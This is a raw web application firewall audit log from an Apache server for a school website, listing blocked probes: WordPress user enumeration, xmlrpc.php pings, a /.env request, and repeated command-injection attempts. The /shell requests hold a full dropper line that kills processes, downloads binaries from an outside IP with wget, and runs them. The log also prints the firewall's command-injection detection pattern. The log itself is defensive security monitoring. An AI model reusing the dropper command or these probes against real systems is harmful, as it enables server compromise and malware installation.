smkn22-jkt.sch.id X-Real-IP: 156.233.72.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d1e8f24-C-- demo.sayHello --4d1e8f24-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d1e8f24-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746324160211477 4981 (- - -) Stopwatch2: 1746324160211477 4981; combined=3784, p1=473, p2=3108, p3=23, p4=26, p5=90, sr=68, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d1e8f24-Z-- --216fff50-A-- [04/May/2025:09:03:13 +0700] aBbK4echPF6irSergtv89gAAANY 103.236.140.4 35428 103.236.140.4 8181 --216fff50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --216fff50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --216fff50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746324193401485 3457 (- - -) Stopwatch2: 1746324193401485 3457; combined=1506, p1=470, p2=1003, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --216fff50-Z-- --07cfff49-A-- [04/May/2025:09:03:18 +0700] aBbK5vnZiHJYHUAF8QfcBQAAAAM 103.236.140.4 35432 103.236.140.4 8181 --07cfff49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07cfff49-C-- demo.sayHello --07cfff49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07cfff49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746324198685549 5085 (- - -) Stopwatch2: 1746324198685549 5085; combined=3878, p1=454, p2=3200, p3=35, p4=30, p5=92, sr=67, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07cfff49-Z-- --1af3d834-A-- [04/May/2025:09:22:09 +0700] aBbPUechPF6irSergtv9DwAAAMQ 103.236.140.4 35562 103.236.140.4 8181 --1af3d834-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --1af3d834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1af3d834-E-- --1af3d834-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746325329494944 2641 (- - -) Stopwatch2: 1746325329494944 2641; combined=809, p1=503, p2=267, p3=0, p4=0, p5=39, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1af3d834-Z-- --9fb08f24-A-- [04/May/2025:09:39:21 +0700] aBbTWWJEE9ao5dcyYWnu4AAAAI4 103.236.140.4 35800 103.236.140.4 8181 --9fb08f24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.141.52 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.141.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9fb08f24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fb08f24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746326361398278 791 (- - -) Stopwatch2: 1746326361398278 791; combined=324, p1=280, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fb08f24-Z-- --806eae2b-A-- [04/May/2025:10:04:15 +0700] aBbZL_nZiHJYHUAF8QfcMAAAAAI 103.236.140.4 36224 103.236.140.4 8181 --806eae2b-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --806eae2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --806eae2b-E-- --806eae2b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746327855240264 2403 (- - -) Stopwatch2: 1746327855240264 2403; combined=761, p1=469, p2=259, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --806eae2b-Z-- --73dcb017-A-- [04/May/2025:10:28:52 +0700] aBbe9NsVQyl9V2B8Pt-wywAAAFA 103.236.140.4 36402 103.236.140.4 8181 --73dcb017-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73dcb017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73dcb017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746329332980782 2954 (- - -) Stopwatch2: 1746329332980782 2954; combined=1432, p1=469, p2=932, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73dcb017-Z-- --546a0d16-A-- [04/May/2025:10:28:58 +0700] aBbe-tsVQyl9V2B8Pt-wzAAAAFI 103.236.140.4 36412 103.236.140.4 8181 --546a0d16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --546a0d16-C-- demo.sayHello --546a0d16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --546a0d16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746329338636492 5624 (- - -) Stopwatch2: 1746329338636492 5624; combined=4027, p1=532, p2=3280, p3=29, p4=31, p5=92, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --546a0d16-Z-- --e2be8a46-A-- [04/May/2025:10:30:00 +0700] aBbfOOchPF6irSergtv9YAAAAMw 103.236.140.4 36454 103.236.140.4 8181 --e2be8a46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e2be8a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2be8a46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746329400819858 3146 (- - -) Stopwatch2: 1746329400819858 3146; combined=1382, p1=530, p2=823, p3=0, p4=0, p5=29, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2be8a46-Z-- --8134b360-A-- [04/May/2025:10:30:08 +0700] aBbfQPnZiHJYHUAF8QfcPgAAAAg 103.236.140.4 36458 103.236.140.4 8181 --8134b360-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.119.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.119.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8134b360-C-- demo.sayHello --8134b360-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8134b360-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746329408352188 6055 (- - -) Stopwatch2: 1746329408352188 6055; combined=4344, p1=625, p2=3548, p3=26, p4=27, p5=70, sr=152, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8134b360-Z-- --10175d78-A-- [04/May/2025:10:59:05 +0700] aBbmCdsVQyl9V2B8Pt-w5gAAAE8 103.236.140.4 36642 103.236.140.4 8181 --10175d78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10175d78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10175d78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331145898434 3160 (- - -) Stopwatch2: 1746331145898434 3160; combined=1285, p1=443, p2=813, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10175d78-Z-- --502b8e52-A-- [04/May/2025:10:59:15 +0700] aBbmE9sVQyl9V2B8Pt-w6AAAAFM 103.236.140.4 36646 103.236.140.4 8181 --502b8e52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --502b8e52-C-- demo.sayHello --502b8e52-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --502b8e52-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331155221113 5119 (- - -) Stopwatch2: 1746331155221113 5119; combined=3800, p1=478, p2=3115, p3=23, p4=25, p5=92, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --502b8e52-Z-- --a9d4f755-A-- [04/May/2025:11:06:02 +0700] aBbnquchPF6irSergtv9dgAAAMU 103.236.140.4 36714 103.236.140.4 8181 --a9d4f755-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a9d4f755-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9d4f755-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331562138764 3082 (- - -) Stopwatch2: 1746331562138764 3082; combined=1310, p1=452, p2=829, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d4f755-Z-- --4cfc8924-A-- [04/May/2025:11:06:10 +0700] aBbnsvnZiHJYHUAF8QfcTgAAAAw 103.236.140.4 36718 103.236.140.4 8181 --4cfc8924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4cfc8924-C-- demo.sayHello --4cfc8924-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cfc8924-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746331570643973 5245 (- - -) Stopwatch2: 1746331570643973 5245; combined=3938, p1=535, p2=3199, p3=24, p4=24, p5=91, sr=140, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cfc8924-Z-- --1dc64c27-A-- [04/May/2025:11:07:32 +0700] aBboBPnZiHJYHUAF8QfcUAAAABA 103.236.140.4 36722 103.236.140.4 8181 --1dc64c27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1dc64c27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dc64c27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746331652484898 3394 (- - -) Stopwatch2: 1746331652484898 3394; combined=1495, p1=528, p2=934, p3=0, p4=0, p5=32, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dc64c27-Z-- --f8d82c12-A-- [04/May/2025:11:07:38 +0700] aBboCuchPF6irSergtv9dwAAAMg 103.236.140.4 36726 103.236.140.4 8181 --f8d82c12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f8d82c12-C-- demo.sayHello --f8d82c12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d82c12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] 